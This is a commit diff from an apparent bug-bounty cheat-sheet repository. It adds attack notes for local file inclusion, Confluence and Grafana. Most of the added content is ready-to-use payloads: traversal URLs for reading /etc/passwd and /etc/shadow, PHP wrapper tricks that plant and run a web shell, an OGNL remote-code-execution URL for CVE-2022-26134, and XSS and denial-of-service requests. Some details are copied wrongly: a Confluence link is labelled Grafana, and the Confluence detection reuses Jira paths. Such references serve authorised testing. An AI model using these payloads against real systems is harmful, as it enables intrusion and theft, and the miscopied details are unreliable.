STRLCPY/AllAboutBugBounty

Add LFI + Confluence and fix grafana structure
Muhammad Daffa committed 2 years ago

f2880660

1 parent a0048665

■ ■ ■ ■ ■ ■ ■

Local File Inclusion.md

1		-	# Soon!
	1	+	## Local File Inclusion
	2	+
	3	+	## Introduction
	4	+	Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server
	5	+
	6	+	## How to exploit
	7	+	1. Basic payload
	8	+	```
	9	+	http://example.com/index.php?page=../../../etc/passwd
	10	+	http://example.com/index.php?page=../../../../../../../../../../../../etc/shadow
	11	+	```
	12	+
	13	+	2. URL encoding
	14	+	```
	15	+	http://example.com/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
	16	+	```
	17	+
	18	+	3. Double encoding
	19	+	```
	20	+	http://example.com/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd
	21	+	```
	22	+
	23	+	4. UTF-8 encoding
	24	+	```
	25	+	http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
	26	+	```
	27	+
	28	+	5. Using Null Byte (%00)
	29	+	```
	30	+	http://example.com/index.php?page=../../../etc/passwd%00
	31	+	```
	32	+
	33	+	6. From an existent folder
	34	+	```
	35	+	http://example.com/index.php?page=scripts/../../../../../etc/passwd
	36	+	```
	37	+
	38	+	7. Path truncation
	39	+	```
	40	+	http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
	41	+	http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
	42	+	```
	43	+
	44	+	8. Using PHP Wrappers: filter
	45	+	```
	46	+	http://example.com/index.php?page=php://filter/read=string.rot13/resource=config.php
	47	+	http://example.com/index.php?page=php://filter/convert.base64-encode/resource=config.php
	48	+	```
	49	+
	50	+	9. Using PHP Wrappers: zlib
	51	+	```
	52	+	http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/shadow
	53	+	```
	54	+
	55	+	10. Using PHP Wrappers: zip
	56	+	```
	57	+	echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
	58	+	zip payload.zip payload.php;
	59	+	mv payload.zip shell.jpg;
	60	+	rm payload.php
	61	+
	62	+	http://example.com/index.php?page=zip://shell.jpg%23payload.php
	63	+	```
	64	+
	65	+	11. Using PHP Wrappers: data
	66	+	```
	67	+	http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
	68	+	```
	69	+
	70	+	12. Using PHP Wrappers: expect
	71	+	```
	72	+	http://example.com/index.php?page=expect://ls
	73	+	```
	74	+
	75	+	13. Using PHP Wrappers: input
	76	+	```
	77	+	POST /index.php?page=php://input&cmd=ls HTTP/1.1
	78	+	Host: example.com
	79	+	...
	80	+
	81	+	<?php echo shell_exec($_GET['cmd']); ?>
	82	+	```
	83	+
	84	+	14. Some unique bypass
	85	+	```
	86	+	http://example.com/index.php?page=....//....//etc/passwd
	87	+	http://example.com/index.php?page=..///////..////..//////etc/passwd
	88	+	http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
	89	+	http://example.com/index.php?page=/.%2e/.%2e/.%2e/.%2e/etc/passwd
	90	+	http://example.com/index.php?page=/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
	91	+	```
	92	+
	93	+	## References
	94	+	* [Aptive](https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/)

■ ■ ■ ■ ■ ■

README.md

		skipped 14 lines
15	15		- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
16	16		- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
17	17		- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
18		-	- Local File Inclusion (SOON)
	18	+	- [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
19	19		- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
20	20		- SQL Injection (SOON)
21	21		- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
		skipped 19 lines
41	41		- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
42	42
43	43		## Technologies
	44	+	- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
44	45		- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
45	46		- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
46	47		- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
		skipped 15 lines

■ ■ ■ ■ ■ ■

Technologies/Confluence.md

1	+	# Confluence Common Bugs
2	+
3	+	## Introduction
4	+	What would you do if you came across a website that uses Confluence?
5	+
6	+	## How to Detect
7	+	```
8	+	https://example.com/secure/Dashboard.jspa
9	+	https://example.com/login.jsp
10	+	```
11	+
12	+	1. Find the related CVE by checking Confluence version
13	+	* How to find the Confluence version
14	+
15	+	Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the Confluence version. If you found outdated Confluence version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-6258/Atlassian-Confluence.html)
16	+
17	+	Some example CVE:
18	+
19	+	- CVE-2022-26134 (Remote Code Execution)
20	+	```
21	+	https://example.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
22	+	```
23	+
24	+	- CVE-2021-26085 (Arbitrary File Read)
25	+	```
26	+	https://example.com/s/test/_/;/WEB-INF/web.xml
27	+	```

■ ■ ■ ■ ■ ■

Technologies/Grafana.md

1	1		# Grafana
2		-	1. CVE-2021-41174 (Reflected XSS)
	2	+
	3	+	## Introduction
	4	+	What would you do if you came across a website that uses Grafana?
	5	+
	6	+	## How to Detect
	7	+	Try to HTTP request to `https://example.com/login` and there is a form login
	8	+
	9	+	1. Find the related CVE by checking grafana version
	10	+	* How to find the grafana version
	11	+
	12	+	Try to request to `https://example.com/login` and then check the source code. You will find the version in JSON body `"isEnterprise":false,"latestVersion:"9.0.0","version":"8.3.2"` so 8.3.2 is the grafana version. If you found outdated grafana version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-18548/product_id-47055/Grafana-Grafana.html)
	13	+
	14	+	Some example CVE:
	15	+
	16	+	- CVE-2021-41174 (Reflected XSS)
3	17		```
4	18		https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
5	19		```
6		-	2. CVE-2020-13379 (Denial of Service)
	20	+	- CVE-2020-13379 (Denial of Service)
7	21		```
8	22		https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
9	23		```
10		-	3. CVE-2020-11110 (Stored XSS)
	24	+	- CVE-2020-11110 (Stored XSS)
11	25		```
12	26		POST /api/snapshots HTTP/1.1
13	27		Host: example.com
		skipped 5 lines
19	33
20	34		{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
21	35		```
22		-	4. CVE-2019-15043 (Grafana Unauthenticated API)
	36	+	- CVE-2019-15043 (Grafana Unauthenticated API)
23	37		```
24	38		POST /api/snapshots HTTP/1.1
25	39		Host: example.com
		skipped 5 lines
31	45
32	46		{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
33	47		```
34		-	5. Default Credentials
	48	+	2. Default Credentials
35	49		```
36	50		Try to login using admin as username and password
37	51		```
38		-	6. Signup Enabled
	52	+	3. Signup Enabled
39	53		```
40	54		https://example.com/signup
41	55		```

■ ■ ■ ■ ■ ■

Technologies/Jira.md

		skipped 11 lines
12	12		1. Find the related CVE by checking jira version
13	13		* How to find the jira version
14	14
15		-	Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)
	15	+	Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the jira version. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)
16	16
17	17		Some example CVE:
18	18
		skipped 73 lines

Add LFI + Confluence and fix grafana structure